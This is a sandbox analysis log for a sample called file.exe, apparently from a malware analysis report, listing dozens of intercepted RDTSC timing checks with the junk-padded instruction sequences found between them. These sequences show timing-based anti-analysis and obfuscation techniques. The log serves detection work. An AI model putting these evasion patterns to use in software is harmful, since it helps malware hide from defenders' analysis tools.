Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119332F second address: 1193355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FF249520A41h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1193355 second address: 1193374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007FF248D53496h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF248D534A1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1193374 second address: 119337A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119FEBD second address: 119FEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119FEC1 second address: 119FEC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119FEC7 second address: 119FECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119FECD second address: 119FEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF249520A26h 0x0000000a jmp 00007FF249520A36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A453A second address: 11A453E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A453E second address: 11A454E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF249520A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A2168 second address: 11A21A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF248D534A3h 0x00000009 jmp 00007FF248D534A8h 0x0000000e popad 0x0000000f pushad 0x00000010 ja 00007FF248D53496h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B0E9B second address: 11B0E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B0D17 second address: 11B0D1D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B51C8 second address: 11B51D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B51D1 second address: 11B51DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B51DD second address: 11B51E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B51E3 second address: 11B51E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B51E7 second address: 11B51ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4EA8 second address: 11B4EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF248D534A3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDFC4 second address: 11CDFCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDFCA second address: 11CDFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDFCE second address: 11CDFD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDFD2 second address: 11CDFDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF248D53496h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDFDE second address: 11CE021 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF249520A3Bh 0x00000008 jmp 00007FF249520A35h 0x0000000d jmp 00007FF249520A39h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 js 00007FF249520A2Eh 0x0000001b push esi 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CCDEB second address: 11CCDEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CCF65 second address: 11CCF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF249520A34h 0x00000009 jp 00007FF249520A26h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD262 second address: 11CD26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD26A second address: 11CD2A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF249520A39h 0x00000009 jno 00007FF249520A26h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FF249520A2Eh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD2A2 second address: 11CD2A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD69B second address: 11CD6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007FF249520A35h 0x0000000b jbe 00007FF249520A32h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD6BD second address: 11CD6CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF248D53496h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD6CB second address: 11CD6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDB90 second address: 11CDB96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDD4A second address: 11CDD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF249520A2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D1DF3 second address: 11D1DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D1E9D second address: 11D1EA7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF249520A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D2393 second address: 11D2398 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D2398 second address: 11D2403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FF249520A28h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov dx, 559Fh 0x00000028 push dword ptr [ebp+122D1D30h] 0x0000002e mov dh, cl 0x00000030 jmp 00007FF249520A30h 0x00000035 push E9E22EECh 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d jmp 00007FF249520A35h 0x00000042 jng 00007FF249520A26h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D2403 second address: 11D2408 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3768 second address: 11D3780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3780 second address: 11D3786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3786 second address: 11D37A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF249520A39h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D37A7 second address: 11D37E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FF248D534A9h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jp 00007FF248D534A9h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8005D second address: 4C80061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80061 second address: 4C80065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80065 second address: 4C8006B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0611 second address: 4CC0617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0617 second address: 4CC061B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC061B second address: 4CC0663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF248D534A9h 0x00000010 sub eax, 162F0286h 0x00000016 jmp 00007FF248D534A1h 0x0000001b popfd 0x0000001c mov di, si 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0663 second address: 4CC0667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0667 second address: 4CC066D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50185 second address: 4C501B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 5C1AB4C9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007FF249520A34h 0x00000012 or eax, 3F05C918h 0x00000018 jmp 00007FF249520A2Bh 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C501DB second address: 4C50248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D534A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF248D534A3h 0x00000013 or si, 6FEEh 0x00000018 jmp 00007FF248D534A9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FF248D534A0h 0x00000024 sbb ah, 00000068h 0x00000027 jmp 00007FF248D5349Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50248 second address: 4C50260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF249520A34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D2C second address: 4C70D55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 jmp 00007FF248D534A9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D55 second address: 4C70D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D59 second address: 4C70D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D5349Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70819 second address: 4C7081F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7081F second address: 4C70823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70507 second address: 4C7050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7050B second address: 4C70511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70511 second address: 4C7052E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF249520A39h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7052E second address: 4C70549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007FF248D5349Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70549 second address: 4C7054D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C803E9 second address: 4C80416 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D534A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, 427Eh 0x00000011 jmp 00007FF248D5349Fh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80416 second address: 4C8042E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF249520A34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC053E second address: 4CC0544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0544 second address: 4CC0563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF249520A33h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0563 second address: 4CC05C3 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FF248D534A2h 0x0000000d pushfd 0x0000000e jmp 00007FF248D534A2h 0x00000013 or esi, 55CF9148h 0x00000019 jmp 00007FF248D5349Bh 0x0000001e popfd 0x0000001f popad 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 jmp 00007FF248D534A6h 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC05C3 second address: 4CC05C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC05C9 second address: 4CC05CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC05CF second address: 4CC05D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC05D3 second address: 4CC05D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70695 second address: 4C7069B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7069B second address: 4C706A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706A1 second address: 4C706A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706A5 second address: 4C706A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706A9 second address: 4C7072D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF249520A2Ah 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007FF249520A31h 0x00000015 mov eax, 32F19C77h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FF249520A2Fh 0x00000025 add esi, 71239EFEh 0x0000002b jmp 00007FF249520A39h 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007FF249520A30h 0x00000037 or ecx, 06A23DF8h 0x0000003d jmp 00007FF249520A2Bh 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7072D second address: 4C7075B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D534A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF248D5349Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C900F7 second address: 4C9010F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF249520A34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9010F second address: 4C90113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90113 second address: 4C9012F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a mov di, ax 0x0000000d push esi 0x0000000e mov ax, di 0x00000011 pop edi 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9012F second address: 4C90135 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90135 second address: 4C9013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9013B second address: 4C9013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9013F second address: 4C90158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movzx ecx, dx 0x0000000e movsx edi, ax 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90158 second address: 4C9015E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9037A second address: 4C903C6 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 8847h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dl, al 0x0000000d push edi 0x0000000e mov esi, 46F71137h 0x00000013 pop ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF249520A2Fh 0x0000001f and esi, 252A96BEh 0x00000025 jmp 00007FF249520A39h 0x0000002a popfd 0x0000002b push eax 0x0000002c pop edi 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C903C6 second address: 4C903CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C903CC second address: 4C903D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C903D0 second address: 4C903D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C903D4 second address: 4C903ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF249520A2Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C903ED second address: 4C903F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C903F2 second address: 4C90414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 04h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF249520A35h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90414 second address: 4C90424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF248D5349Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB073C second address: 4CB0742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
